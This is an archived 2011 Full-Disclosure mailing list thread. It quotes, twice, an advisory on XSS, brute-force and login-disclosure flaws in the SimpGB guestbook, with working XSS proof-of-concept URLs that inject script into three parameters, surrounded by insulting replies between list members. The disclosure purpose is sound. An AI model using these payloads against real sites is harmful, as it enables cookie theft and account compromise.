[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <4D4E7B56.1080808@gmail.com>
Date: Sun, 06 Feb 2011 11:43:34 +0100
From: Michele Orru <antisnatchor@...il.com>
To: laurent gaffie <laurent.gaffie@...il.com>
Cc: full-disclosure@...ts.grok.org.uk, MustLive <mustlive@...security.com.ua>
Subject: Re: Multiple vulnerabilities in SimpGB
ahaah.
Nice reply Sparky.
MustLive, seems you've been defaced :-)
antisnatchor
> ------------------------------------------------------------------------
>
> laurent gaffie <mailto:laurent.gaffie@...il.com>
> February 5, 2011 3:36 AM
>
>
> Hey Sparky,
>
> One of the many many thing you didn't understand during the past 5
> years is that you should probably try to identify and fix your stuff
> on *your* website, before spamming this ML with your crap.
> cf:
> http://www.zone-h.org/mirror/id/11367858
>
> e-tard.
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> ------------------------------------------------------------------------
>
> MustLive <mailto:mustlive@...security.com.ua>
> February 4, 2011 10:49 PM
>
>
> Hello Laurent!
>
> You are very "intelligent" man, as I see from this and previous your
> letter
> (in 2010).
>
> You need to take into account the next:
>
> 1. I know better where to send.
>
> 2. If you write shitty stuff, then it doesn't mean that other do the same.
>
> 3. No need to think and state instead of other people - if it's not
> interesting for you, then it can be interesting for others.
>
> 4. The main and obvious thing it's that I write all my advisories from
> 2006
> for those people who are interested in them (and there are such
> people, as I
> know for sure). So if you or anybody else is not interested in them, just
> skip them (and don't need to write me nonsenses) - I'm writing my letters
> not for you, but for others who is interested in them and who thanks
> me for
> my work. It's strange that such "intelligent" man as you didn't understand
> it for last five years :-).
>
> 5. I don't need any not serious letters from you, so don't waste your time
> writing me anymore, because I've put your e-mail into blacklist. Spend
> your
> time for good things.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> ----- Original Message -----
> From: laurent gaffie
> To: MustLive
> Cc: full-disclosure@...ts.grok.org.uk ; bugtraq@...urityfocus.com
> Sent: Wednesday, January 26, 2011 5:09 PM
> Subject: Re: [Full-disclosure] Multiple vulnerabilities in SimpGB
>
>
> Send your shitty stuff to bugtraq@...urityfocus.com
>
> If it's not obvious, no one give a shit here, seriously.
>
>
>
> 2011/1/27 MustLive <mustlive@...security.com.ua>
>
> Hello list!
>
> I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
> Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are SimpGB v1.49.02 and previous versions.
>
> ----------
> Details:
> ----------
>
> XSS (WASC-08):
>
> POST request at page http://site/guestbook.php in parameters poster,
> postingid and location in Preview function. If captcha is using in
> guestbook, then working code of the captcha is required for the attack. Or
> via GET request:
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
>
> Brute Force (WASC-11):
>
> http://site/admin/index.php
>
> Insufficient Anti-automation (WASC-21):
>
> http://site/admin/pwlost.php
>
> In this functionality there is no protection from automated requests
> (captcha).
>
> Abuse of Functionality (WASC-42):
>
> http://site/admin/pwlost.php
>
> In this functionality it's possible to retrieve logins.
>
> ------------
> Timeline:
> ------------
>
> 2010.11.17 - announced at my site.
> 2010.11.19 - informed developers.
> 2011.01.25 - disclosed at my site.
>
> I mentioned about these vulnerabilities at my site
> (http://websecurity.com.ua/4690/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> ------------------------------------------------------------------------
>
> laurent gaffie <mailto:laurent.gaffie@...il.com>
> January 26, 2011 4:09 PM
>
>
> Send your shitty stuff to bugtraq@...urityfocus.com
> <mailto:bugtraq@...urityfocus.com>
>
> If it's not obvious, no one give a shit here, seriously.
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> ------------------------------------------------------------------------
>
> MustLive <mailto:mustlive@...security.com.ua>
> January 26, 2011 3:15 PM
>
>
> Hello list!
>
> I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
> Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are SimpGB v1.49.02 and previous versions.
>
> ----------
> Details:
> ----------
>
> XSS (WASC-08):
>
> POST request at page http://site/guestbook.php in parameters poster,
> postingid and location in Preview function. If captcha is using in
> guestbook, then working code of the captcha is required for the attack. Or
> via GET request:
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
>
> Brute Force (WASC-11):
>
> http://site/admin/index.php
>
> Insufficient Anti-automation (WASC-21):
>
> http://site/admin/pwlost.php
>
> In this functionality there is no protection from automated requests
> (captcha).
>
> Abuse of Functionality (WASC-42):
>
> http://site/admin/pwlost.php
>
> In this functionality it's possible to retrieve logins.
>
> ------------
> Timeline:
> ------------
>
> 2010.11.17 - announced at my site.
> 2010.11.19 - informed developers.
> 2011.01.25 - disclosed at my site.
>
> I mentioned about these vulnerabilities at my site
> (http://websecurity.com.ua/4690/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Content of type "text/html" skipped
Download attachment "compose-unknown-contact.jpg" of type "image/jpeg" (1421 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists